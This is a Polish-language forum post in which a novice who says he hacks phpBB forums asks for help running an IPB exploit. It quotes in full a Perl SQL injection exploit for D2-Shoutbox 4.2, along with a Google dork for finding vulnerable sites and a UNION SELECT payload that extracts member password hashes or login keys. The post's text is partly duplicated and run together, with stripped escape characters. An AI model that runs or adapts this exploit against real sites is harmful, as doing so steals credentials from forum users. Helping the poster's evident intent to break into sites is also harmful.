Mam taki problem jak wpisuje w wierszu ploecen :
to wyskakuje mi takie cos :
moze ktos mi powiedzec co ja mam wpisac po adresie strony by mi ten exploit zadzialal ?
z kad ja mam hash wziasc ja jeszcze exploit nie zrobil tego co mial ? :|
exploit :
p.s
Pewnie temat denny i myslicie ze jestem jakas lama to tu macie racje umiem tyylko hackowac phpBB modified by Przemo. IPB tez by sie przydalo pliska o jakies wytlumaczenie z gory thx.
Kod:
perl ipb.pl [url]www.adres.streony.pl/[/url] 2to wyskakuje mi takie cos :
Kod:
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl [url]www.host.com[/url] /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2moze ktos mi powiedzec co ja mam wpisac po adresie strony by mi ten exploit zadzialal ?
z kad ja mam hash wziasc ja jeszcze exploit nie zrobil tego co mial ? :|
exploit :
Kod:
#!/usr/bin/perl
#########################################################
# _______ _______ ______ #
# |______ |______ | #
# ______| |______ |_____/ #
# #
#D2-Shoutbox 4.2(IPB Mod)<=SQL injection #
#Created By SkOd #
#SED security Team #
#[url]http://www.sed-team.be [/url] #
#[email protected] #
#ISRAEL #
#########################################################
#google:
#"Powered By D2-Shoutbox 4.2"
#########################################################
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid = $ARGV[3];
$pid = $ARGV[4];
$type = $ARGV[5];
sub type()
{
if($type==1){$row="password";}
if($type==2){$row="member_login_key";}
else{print "Just 1 Or 2n";exit();}
$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
$path = $ARGV[1].$sql;
}
sub header()
{
print q{
#######################################################################
### D2-Shoutbox 4.2 SQL injection Exploit ###
### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
### Created By SkOd, Sed Security Team ###
#######################################################################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl [url]www.host.com[/url] /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
#######################################################################
}
}
sub sedsock()
{
$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failedrn";
print $sedsock "GET $path HTTP/1.1n";
print $sedsock "Host: $hostn";
print $sedsock "Accept: */*n";
print $sedsock "Cookie: member_id=$uid; pass_hash=$pidn";
print $sedsock "Connection: closenn";
while($res = <$sedsock>){
$res =~ m/shout_s'>(.*?)</textarea>/ && print "[+]User: $usern[+]Md5 Hash: $1n";
}
}
if(@ARGV < 6){
header();
}else{
type();
sedsock();
}
# milw0rm.com [2006-03-06]p.s
Pewnie temat denny i myslicie ze jestem jakas lama to tu macie racje umiem tyylko hackowac phpBB modified by Przemo. IPB tez by sie przydalo pliska o jakies wytlumaczenie z gory thx.
